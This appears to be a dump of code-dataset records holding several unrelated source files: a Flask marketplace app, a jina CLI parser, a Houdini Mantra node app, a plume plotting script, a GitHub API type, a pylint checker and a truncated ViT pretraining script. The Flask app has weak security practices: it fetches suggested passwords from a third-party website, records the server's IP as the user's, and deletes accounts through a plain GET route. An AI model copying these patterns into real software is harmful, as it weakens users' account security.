# don't need to specify sender, default is in app config
msg = Message(form.subject.data, sender="support@flippinapp.com",
recipients=["support@flippinapp.com"])
msg.body = """
From: %s <%s>
About: %s
%s
""" % (form.name.data, form.email.data, form.subject.data, form.message.data)
mail.send(msg)
flash('Thanks for reaching out! We will get back to you shortly.', 'success')
return render_template('contact.html', form=form)
if __name__ == '__main__':
application.run()
| 37.698113
| 92
| 0.649983
|
from flask import Flask, render_template, request, flash, redirect, url_for, session
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Message, Mail
from passlib.hash import sha256_crypt
from functools import wraps
import requests
import time
application = Flask(__name__)
application.config.from_object('config.AWSConfig')
db = SQLAlchemy(application)
mail = Mail()
mail.init_app(application)
from models import Cities, Users, Listings
from forms import RegisterForm, ContactForm, ProfileForm
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash ("Please login to see this content.", "danger")
return redirect(url_for('login'))
return wrap
@application.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
recommendation = requests.get('https://www.passwordrandom.com/query?command=password')\
.content.decode("utf-8")
ip = requests.get('https://www.passwordrandom.com/query?command=ip').\
content.decode("utf-8")
flash("We recommend using password: '%s'" % recommendation, 'warning')
if request.method == 'POST' and form.validate():
new_user = Users(first=form.first.data,
last=form.last.data,
email=form.email.data,
username=form.username.data,
city=form.city.data,
password=sha256_crypt.encrypt(str(form.password.data)),
ip=ip,
register_date=time.strftime('%Y-%m-%d %H:%M:%S'))
db.session.add(new_user)
db.session.commit()
session.pop('_flashes', None)
flash('Welcome to flippin!\nYour account has been successfully created.', 'success')
return redirect(url_for('index'))
return render_template('register.html', form=form)
@application.route('/')
def index():
return render_template('home.html')
@application.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form['username']
password_candidate = request.form['password']
result = Users.query.filter_by(username=username).first()
if result is not None:
password = result.password
if sha256_crypt.verify(password_candidate, password):
session['logged_in'] = True
session['username'] = username
session['city'] = result.city
session['city_name'] = Cities.query.filter_by(id=result.city).first().name
flash('Log in successful. Enjoy!', 'success')
return redirect(url_for('items'))
else:
return render_template('login.html', error="Invalid password")
else:
return render_template('login.html', error="No user found")
return render_template('login.html')
@application.route('/items')
@is_logged_in
def items():
listings = Listings.query.filter_by(city=session['city']).all()
return render_template('items.html', items=listings, length=len(listings))
@application.route('/profile', methods=['GET', 'POST'])
@is_logged_in
def profile():
form = ProfileForm(request.form)
user = Users.query.filter_by(username=session['username']).first()
if request.method == 'POST' and form.validate():
user.email = form.email.data
user.city = form.city.data
user.password = sha256_crypt.encrypt(str(form.password.data))
session['city'] = form.city.data
db.session.commit()
flash('Your account settings have been updated.', 'success')
return redirect(url_for('profile'))
return render_template('profile.html', user=user, form=form)
@application.route('/delete')
@is_logged_in
def delete_user():
db.session.query(Users).filter(Users.username == session['username']).delete()
db.session.commit()
session.clear()
flash('Your account has been deleted! Sorry to see you go.', 'success')
return render_template('home.html')
@application.route('/logout')
def logout():
session.clear()
flash('You are now logged out', 'success')
return redirect(url_for('login'))
@application.route('/contact', methods=['GET', 'POST'])
def contact():
form = ContactForm(request.form)
if request.method == 'POST' and form.validate():
msg = Message(form.subject.data, sender="support@flippinapp.com",
recipients=["support@flippinapp.com"])
msg.body = """
From: %s <%s>
About: %s
%s
""" % (form.name.data, form.email.data, form.subject.data, form.message.data)
mail.send(msg)
flash('Thanks for reaching out! We will get back to you shortly.', 'success')
return render_template('contact.html', form=form)
if __name__ == '__main__':
application.run()
| true
| true
|
f70b3e78a726fa7daeafb49f4ec49e13ef4467c9
| 3,463
|
py
|
Python
|
jina/parsers/helloworld.py
|
ryan-zheng-teki/jina
|
042175fdb7e3ed8d9dd17233231beb2a8c2004bf
|
[
"Apache-2.0"
] | null | null | null |
jina/parsers/helloworld.py
|
ryan-zheng-teki/jina
|
042175fdb7e3ed8d9dd17233231beb2a8c2004bf
|
[
"Apache-2.0"
] | null | null | null |
jina/parsers/helloworld.py
|
ryan-zheng-teki/jina
|
042175fdb7e3ed8d9dd17233231beb2a8c2004bf
|
[
"Apache-2.0"
] | null | null | null |
from pkg_resources import resource_filename
from .base import set_base_parser
from .helper import add_arg_group
from ..helper import get_random_identity
def set_hw_parser(parser=None):
if not parser:
parser = set_base_parser()
gp = add_arg_group(parser, title='General')
gp.add_argument('--workdir', type=str, default=get_random_identity(),
help='the workdir for hello-world demo, '
'all data, indices, shards and outputs will be saved there')
gp.add_argument('--logserver', action='store_true', default=False,
help='start a log server for the dashboard')
gp.add_argument('--logserver-config', type=str,
default=resource_filename('jina',
'/'.join(('resources', 'logserver.default.yml'))),
help='the yaml config of the log server')
gp.add_argument('--download-proxy', type=str,
help='specify the proxy when downloading sample data')
gp = add_arg_group(parser, title='Scalability')
gp.add_argument('--shards', type=int,
default=2,
                    help='number of shards used when indexing and querying')
gp.add_argument('--parallel', type=int,
default=2,
                    help='degree of parallelism used when indexing and querying')
gp = add_arg_group(parser, title='Index')
gp.add_argument('--uses-index', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.index.yml'))),
help='the yaml path of the index flow')
gp.add_argument('--index-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
help='the url of index data (should be in idx3-ubyte.gz format)')
gp.add_argument('--index-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
                    help='the url of index labels data (should be in idx1-ubyte.gz format)')
gp.add_argument('--index-batch-size', type=int,
default=1024,
help='the batch size in indexing')
gp = add_arg_group(parser, title='Search')
gp.add_argument('--uses-query', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.query.yml'))),
help='the yaml path of the query flow')
gp.add_argument('--query-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
help='the url of query data (should be in idx3-ubyte.gz format)')
gp.add_argument('--query-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
                    help='the url of query labels data (should be in idx1-ubyte.gz format)')
gp.add_argument('--query-batch-size', type=int,
default=32,
help='the batch size in searching')
gp.add_argument('--num-query', type=int, default=128,
help='number of queries to visualize')
gp.add_argument('--top-k', type=int, default=50,
help='top-k results to retrieve and visualize')
return parser
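# Illustrative usage sketch (not in the original file): the returned parser
# composes with argparse as usual, with defaults resolved from jina's bundled
# resource files:
#
#     parser = set_hw_parser()
#     args = parser.parse_args(['--shards', '4', '--top-k', '20'])
#     assert args.shards == 4 and args.top_k == 20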
| 54.109375
| 116
| 0.597748
|
from pkg_resources import resource_filename
from .base import set_base_parser
from .helper import add_arg_group
from ..helper import get_random_identity
def set_hw_parser(parser=None):
if not parser:
parser = set_base_parser()
gp = add_arg_group(parser, title='General')
gp.add_argument('--workdir', type=str, default=get_random_identity(),
help='the workdir for hello-world demo, '
'all data, indices, shards and outputs will be saved there')
gp.add_argument('--logserver', action='store_true', default=False,
help='start a log server for the dashboard')
gp.add_argument('--logserver-config', type=str,
default=resource_filename('jina',
'/'.join(('resources', 'logserver.default.yml'))),
help='the yaml config of the log server')
gp.add_argument('--download-proxy', type=str,
help='specify the proxy when downloading sample data')
gp = add_arg_group(parser, title='Scalability')
gp.add_argument('--shards', type=int,
default=2,
                    help='number of shards used when indexing and querying')
gp.add_argument('--parallel', type=int,
default=2,
                    help='degree of parallelism used when indexing and querying')
gp = add_arg_group(parser, title='Index')
gp.add_argument('--uses-index', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.index.yml'))),
help='the yaml path of the index flow')
gp.add_argument('--index-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
help='the url of index data (should be in idx3-ubyte.gz format)')
gp.add_argument('--index-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
                    help='the url of index labels data (should be in idx1-ubyte.gz format)')
gp.add_argument('--index-batch-size', type=int,
default=1024,
help='the batch size in indexing')
gp = add_arg_group(parser, title='Search')
gp.add_argument('--uses-query', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.query.yml'))),
help='the yaml path of the query flow')
gp.add_argument('--query-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
help='the url of query data (should be in idx3-ubyte.gz format)')
gp.add_argument('--query-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
                    help='the url of query labels data (should be in idx1-ubyte.gz format)')
gp.add_argument('--query-batch-size', type=int,
default=32,
help='the batch size in searching')
gp.add_argument('--num-query', type=int, default=128,
help='number of queries to visualize')
gp.add_argument('--top-k', type=int, default=50,
help='top-k results to retrieve and visualize')
return parser
| true
| true
|
f70b3f7012f084ba3f391beabb56936491ed1b59
| 3,833
|
py
|
Python
|
install/app_store/tk-houdini-mantranode/v0.3.0/app.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | 4
|
2019-01-11T03:41:28.000Z
|
2019-09-12T06:57:17.000Z
|
bundle_cache/app_store/tk-houdini-mantranode/v0.3.1/app.py
|
ColinKennedy/tk-config-default2-respawn
|
855fb8033daa549b92615792442f19a7f9c4f55c
|
[
"Linux-OpenIB"
] | null | null | null |
bundle_cache/app_store/tk-houdini-mantranode/v0.3.1/app.py
|
ColinKennedy/tk-config-default2-respawn
|
855fb8033daa549b92615792442f19a7f9c4f55c
|
[
"Linux-OpenIB"
] | 2
|
2019-01-10T05:00:18.000Z
|
2020-02-15T16:32:56.000Z
|
# Copyright (c) 2015 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""
Mantra Output node App for use with Toolkit's Houdini engine.
"""
import sgtk
class TkMantraNodeApp(sgtk.platform.Application):
"""The Mantra Output Node."""
def init_app(self):
"""Initialize the app."""
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
self.handler = tk_houdini_mantra.TkMantraNodeHandler(self)
def convert_to_regular_mantra_nodes(self):
"""Convert Toolkit Mantra nodes to regular Mantra nodes.
        Convert all Toolkit Mantra nodes found in the current script to
regular Mantra nodes. Additional Toolkit information will be stored in
user data named 'tk_*'
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> app.convert_to_regular_mantra_nodes()
"""
self.log_debug(
"Converting Toolkit Mantra nodes to built-in Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_to_regular_mantra_nodes(self)
def convert_back_to_tk_mantra_nodes(self):
"""Convert regular Mantra nodes back to Toolkit Mantra nodes.
Convert any regular Mantra nodes that were previously converted
from Toolkit Mantra nodes back into Toolkit Mantra nodes.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> app.convert_back_to_tk_mantra_nodes()
"""
self.log_debug(
"Converting built-in Mantra nodes back to Toolkit Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_back_to_tk_mantra_nodes(self)
def get_nodes(self):
"""
Returns a list of hou.node objects for each tk mantra node.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> tk_mantra_nodes = app.get_nodes()
"""
self.log_debug("Retrieving tk-houdini-mantra nodes...")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
nodes = tk_houdini_mantra.TkMantraNodeHandler.\
get_all_tk_mantra_nodes()
self.log_debug("Found %s tk-houdini-mantra nodes." % (len(nodes),))
return nodes
def get_output_path(self, node):
"""
Returns the evaluated output path for the supplied node.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> output_path = app.get_output_path(tk_mantra_node)
"""
self.log_debug("Retrieving output path for %s" % (node,))
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
output_path = tk_houdini_mantra.TkMantraNodeHandler.\
get_output_path(node)
self.log_debug("Retrieved output path: %s" % (output_path,))
return output_path
def get_work_file_template(self):
"""
Returns the configured work file template for the app.
"""
return self.get_template("work_file_template")
| 33.920354
| 78
| 0.663449
|
import sgtk
class TkMantraNodeApp(sgtk.platform.Application):
def init_app(self):
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
self.handler = tk_houdini_mantra.TkMantraNodeHandler(self)
def convert_to_regular_mantra_nodes(self):
self.log_debug(
"Converting Toolkit Mantra nodes to built-in Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_to_regular_mantra_nodes(self)
def convert_back_to_tk_mantra_nodes(self):
self.log_debug(
"Converting built-in Mantra nodes back to Toolkit Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_back_to_tk_mantra_nodes(self)
def get_nodes(self):
self.log_debug("Retrieving tk-houdini-mantra nodes...")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
nodes = tk_houdini_mantra.TkMantraNodeHandler.\
get_all_tk_mantra_nodes()
self.log_debug("Found %s tk-houdini-mantra nodes." % (len(nodes),))
return nodes
def get_output_path(self, node):
self.log_debug("Retrieving output path for %s" % (node,))
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
output_path = tk_houdini_mantra.TkMantraNodeHandler.\
get_output_path(node)
self.log_debug("Retrieved output path: %s" % (output_path,))
return output_path
def get_work_file_template(self):
return self.get_template("work_file_template")
| true
| true
|
f70b419f55fd62b2aff2ff85eee6f57f67a7d0d8
| 2,647
|
py
|
Python
|
cases/1d/graphCaseValidation.py
|
andytorrestb/rarefiedPlume
|
c09234c701c395d16519d8a361eae17540711530
|
[
"MIT"
] | null | null | null |
cases/1d/graphCaseValidation.py
|
andytorrestb/rarefiedPlume
|
c09234c701c395d16519d8a361eae17540711530
|
[
"MIT"
] | null | null | null |
cases/1d/graphCaseValidation.py
|
andytorrestb/rarefiedPlume
|
c09234c701c395d16519d8a361eae17540711530
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
# Find path for cases
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
# print(curr_dir_path)
# cases = os.listdir(curr_dir_path + '/Cases')
# pop = cases.index('baseCase')
# cases.pop(pop)
# Label graph with bold characters
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
# Read in digitized data
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius_DAC.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
# Read in simulated data.
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
# Used to see what the values trend to.
print(sim['Ttra_Ar'])
sim = sim[['x', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 8.377e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 1000.0
# Produce analytical data from the isentropic-flow relations
def TTt_Ma(Ma, ga = 1.4):
return (ga + 1) / (2 + (ga - 1) * Ma ** 2)
def rrt_Ma(Ma, ga = 1.4):
rrt = (1 / TTt_Ma(Ma, ga)) ** ((ga + 1) / (ga - 1))
rrt = np.sqrt(np.sqrt(rrt) / Ma)
return rrt
def nnt_Ma(Ma, ga = 1.4):
return TTt_Ma(Ma, ga) ** (1 / (ga - 1))
def a(T, ga = 1.4, R = 287):
return np.sqrt(ga * R * T)
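# Sanity check (illustrative, not in the original script): at the sonic
# condition Ma = 1 each isentropic ratio above reduces to exactly 1, since
# TTt_Ma(1, ga) = (ga + 1) / (2 + (ga - 1)) = 1:
#
#     assert abs(TTt_Ma(1, ga = 1.67) - 1.0) < 1e-12
#     assert abs(rrt_Ma(1, ga = 1.67) - 1.0) < 1e-12
#     assert abs(nnt_Ma(1, ga = 1.67) - 1.0) < 1e-12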
Ma_domain = np.linspace(1, 25, 100)
ga = 1.67
TTt = TTt_Ma(Ma_domain, ga = ga)
rrt = rrt_Ma(Ma_domain, ga = ga)
nnt = nnt_Ma(Ma_domain, ga = ga)
print("Printing rrt")
print(rrt)
# Graph Results
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['rhoN_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, nnt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-4, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['Ttra_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, TTt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-3, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| 27.010204
| 87
| 0.649792
|
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius_DAC.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
print(sim['Ttra_Ar'])
sim = sim[['x', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 8.377e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 1000.0
def TTt_Ma(Ma, ga = 1.4):
return (ga + 1) / (2 + (ga - 1) * Ma ** 2)
def rrt_Ma(Ma, ga = 1.4):
rrt = (1 / TTt_Ma(Ma, ga)) ** ((ga + 1) / (ga - 1))
rrt = np.sqrt(np.sqrt(rrt) / Ma)
return rrt
def nnt_Ma(Ma, ga = 1.4):
return TTt_Ma(Ma, ga) ** (1 / (ga - 1))
def a(T, ga = 1.4, R = 287):
return np.sqrt(ga * R * T)
Ma_domain = np.linspace(1, 25, 100)
ga = 1.67
TTt = TTt_Ma(Ma_domain, ga = ga)
rrt = rrt_Ma(Ma_domain, ga = ga)
nnt = nnt_Ma(Ma_domain, ga = ga)
print("Printing rrt")
print(rrt)
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['rhoN_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, nnt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-4, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['Ttra_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, TTt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-3, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| true
| true
|
f70b420d90436b97dbaad27536f9a5d01d87e845
| 842
|
py
|
Python
|
github/content/licenserule.py
|
ShineyDev/github
|
fbc7a3f66af34350c754e2d8b278ef419d0296b9
|
[
"Apache-2.0"
] | 2
|
2021-04-24T10:54:12.000Z
|
2021-07-08T08:26:58.000Z
|
github/content/licenserule.py
|
ShineyDev/github
|
fbc7a3f66af34350c754e2d8b278ef419d0296b9
|
[
"Apache-2.0"
] | null | null | null |
github/content/licenserule.py
|
ShineyDev/github
|
fbc7a3f66af34350c754e2d8b278ef419d0296b9
|
[
"Apache-2.0"
] | 4
|
2019-07-09T23:23:36.000Z
|
2022-03-30T13:53:15.000Z
|
from github.interfaces import Type
class LicenseRule(Type):
"""
Represents a license rule.
"""
__slots__ = ()
_repr_fields = [
"key",
]
_graphql_fields = [
"description",
"key",
"label",
]
@property
def description(self):
"""
A description of the license rule.
:type: :class:`str`
"""
return self._get_field("description")
@property
def key(self):
"""
The machine-readable key of the license rule.
:type: :class:`str`
"""
return self._get_field("key")
@property
def label(self):
"""
The human-readable label of the license rule.
:type: :class:`str`
"""
return self._get_field("label")
__all__ = [
"LicenseRule",
]
| 15.309091
| 53
| 0.509501
|
from github.interfaces import Type
class LicenseRule(Type):
__slots__ = ()
_repr_fields = [
"key",
]
_graphql_fields = [
"description",
"key",
"label",
]
@property
def description(self):
return self._get_field("description")
@property
def key(self):
return self._get_field("key")
@property
def label(self):
return self._get_field("label")
__all__ = [
"LicenseRule",
]
| true
| true
|
f70b436846b47c3c69212de540878dd80838e8d3
| 2,621
|
py
|
Python
|
Lib/site-packages/pylint/extensions/check_elif.py
|
punithmadaiahkumar/try-django
|
39680a7583122bdd722789f92400edae67c6251d
|
[
"MIT"
] | 2
|
2022-01-06T23:31:00.000Z
|
2022-01-06T23:35:49.000Z
|
Lib/site-packages/pylint/extensions/check_elif.py
|
punithmadaiahkumar/try-django
|
39680a7583122bdd722789f92400edae67c6251d
|
[
"MIT"
] | null | null | null |
Lib/site-packages/pylint/extensions/check_elif.py
|
punithmadaiahkumar/try-django
|
39680a7583122bdd722789f92400edae67c6251d
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2016-2020 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2016 Glenn Matthews <glmatthe@cisco.com>
# Copyright (c) 2018 Ville Skyttä <ville.skytta@iki.fi>
# Copyright (c) 2019-2021 Pierre Sassoulas <pierre.sassoulas@gmail.com>
# Copyright (c) 2020 hippo91 <guillaume.peillex@gmail.com>
# Copyright (c) 2020 Anthony Sottile <asottile@umich.edu>
# Copyright (c) 2021 bot <bot@noreply.github.com>
# Copyright (c) 2021 Daniël van Noord <13665637+DanielNoord@users.noreply.github.com>
# Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
from astroid import nodes
from pylint.checkers import BaseTokenChecker
from pylint.checkers.utils import check_messages
from pylint.interfaces import HIGH, IAstroidChecker, ITokenChecker
class ElseifUsedChecker(BaseTokenChecker):
"""Checks for use of "else if" when an "elif" could be used"""
__implements__ = (ITokenChecker, IAstroidChecker)
name = "else_if_used"
msgs = {
"R5501": (
'Consider using "elif" instead of "else if"',
"else-if-used",
"Used when an else statement is immediately followed by "
"an if statement and does not contain statements that "
"would be unrelated to it.",
)
}
def __init__(self, linter=None):
super().__init__(linter)
self._init()
def _init(self):
self._elifs = {}
def process_tokens(self, tokens):
"""Process tokens and look for 'if' or 'elif'"""
self._elifs = {
begin: token for _, token, begin, _, _ in tokens if token in {"elif", "if"}
}
def leave_module(self, _: nodes.Module) -> None:
self._init()
@check_messages("else-if-used")
def visit_if(self, node: nodes.If) -> None:
"""Current if node must directly follow an 'else'"""
if (
isinstance(node.parent, nodes.If)
and node.parent.orelse == [node]
and (node.lineno, node.col_offset) in self._elifs
and self._elifs[(node.lineno, node.col_offset)] == "if"
):
self.add_message("else-if-used", node=node, confidence=HIGH)
def register(linter):
"""Required method to auto register this checker.
:param linter: Main interface object for Pylint plugins
:type linter: Pylint object
"""
linter.register_checker(ElseifUsedChecker(linter))
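# Illustrative trigger sketch (not part of the checker): with the plugin
# loaded via `pylint --load-plugins=pylint.extensions.check_elif`, the nested
# form is flagged while the flat form is accepted:
#
#     else:           # R5501: else-if-used
#         if cond:
#             do()
#
#     elif cond:      # preferred spelling
#         do()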
| 36.402778
| 87
| 0.662343
|
from astroid import nodes
from pylint.checkers import BaseTokenChecker
from pylint.checkers.utils import check_messages
from pylint.interfaces import HIGH, IAstroidChecker, ITokenChecker
class ElseifUsedChecker(BaseTokenChecker):
__implements__ = (ITokenChecker, IAstroidChecker)
name = "else_if_used"
msgs = {
"R5501": (
'Consider using "elif" instead of "else if"',
"else-if-used",
"Used when an else statement is immediately followed by "
"an if statement and does not contain statements that "
"would be unrelated to it.",
)
}
def __init__(self, linter=None):
super().__init__(linter)
self._init()
def _init(self):
self._elifs = {}
def process_tokens(self, tokens):
self._elifs = {
begin: token for _, token, begin, _, _ in tokens if token in {"elif", "if"}
}
def leave_module(self, _: nodes.Module) -> None:
self._init()
@check_messages("else-if-used")
def visit_if(self, node: nodes.If) -> None:
if (
isinstance(node.parent, nodes.If)
and node.parent.orelse == [node]
and (node.lineno, node.col_offset) in self._elifs
and self._elifs[(node.lineno, node.col_offset)] == "if"
):
self.add_message("else-if-used", node=node, confidence=HIGH)
def register(linter):
linter.register_checker(ElseifUsedChecker(linter))
| true
| true
|
f70b4427b05485de045681e5ad5ce916276873c7
| 5,002
|
py
|
Python
|
pretrain.py
|
nakashima-kodai/FractalDB_Pretrained_ViT_PyTorch
|
5d1df4023f05f5a8ff7e8a8810bf95119a0eeb96
|
[
"MIT"
] | 12
|
2021-05-22T12:13:32.000Z
|
2022-01-27T03:13:48.000Z
|
pretrain.py
|
nakashima-kodai/FractalDB_Pretrained_ViT_PyTorch
|
5d1df4023f05f5a8ff7e8a8810bf95119a0eeb96
|
[
"MIT"
] | null | null | null |
pretrain.py
|
nakashima-kodai/FractalDB_Pretrained_ViT_PyTorch
|
5d1df4023f05f5a8ff7e8a8810bf95119a0eeb96
|
[
"MIT"
] | null | null | null |
import os, sys
import math
import hydra
import torch
import timm
from hydra.utils import instantiate
from timm.loss import LabelSmoothingCrossEntropy, SoftTargetCrossEntropy
from timm.utils import NativeScaler
import models
from data import create_dataloader
from utils import MetricLogger, SmoothedValue
from utils import fix_random_seed
@hydra.main(config_path='./configs', config_name='pretrain')
def main(cfg):
if cfg.seed is not None:
fix_random_seed(cfg.seed)
torch.backends.cudnn.benchmark = True
# dataloader
trainloader, num_classes = create_dataloader(cfg.data)
# additional data augmentation (mixup/cutmix)
mixup_fn = None
mixup_enable = (cfg.data.mixup.mixup_alpha > 0.) or (cfg.data.mixup.cutmix_alpha > 0.)
if mixup_enable:
mixup_fn = instantiate(cfg.data.mixup, num_classes=num_classes)
print(f'MixUp/Cutmix was enabled\n')
# create model
model = instantiate(cfg.model, num_classes=num_classes)
print(f'Model[{cfg.model.model_name}] was created')
# wrap model with DP
model = torch.nn.parallel.DataParallel(model)
model.cuda()
model_without_dp = model.module
# optimizer
scaled_lr = cfg.optim.args.lr * cfg.data.loader.batch_size / 512.0
cfg.optim.args.lr = scaled_lr
optimizer = instantiate(cfg.optim, model=model)
print(f'Optimizer: \n{optimizer}\n')
# scheduler
lr_scheduler, _ = instantiate(cfg.scheduler, optimizer=optimizer)
print(f'Scheduler: \n{lr_scheduler}\n')
# criterion
if cfg.data.mixup.mixup_alpha > 0.:
criterion = SoftTargetCrossEntropy().cuda()
print('SoftTargetCrossEntropy is used for criterion\n')
elif cfg.data.mixup.label_smoothing > 0.:
criterion = LabelSmoothingCrossEntropy(cfg.data.mixup.label_smoothing).cuda()
print('LabelSmoothingCrossEntropy is used for criterion\n')
else:
criterion = torch.nn.CrossEntropyLoss().cuda()
print('CrossEntropyLoss is used for criterion\n')
loss_scaler = NativeScaler()
# load resume
start_epoch = 1
if cfg.resume is not None:
checkpoint = torch.load(cfg.resume, map_location='cpu')
model_without_dp.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
loss_scaler.load_state_dict(checkpoint['scaler'])
start_epoch = checkpoint['epoch'] + 1
print(f'Resume was loaded from {cfg.resume}\n')
print(f'Start training for {cfg.epochs} epochs')
for epoch in range(start_epoch, cfg.epochs + 1):
# train one epoch
model.train()
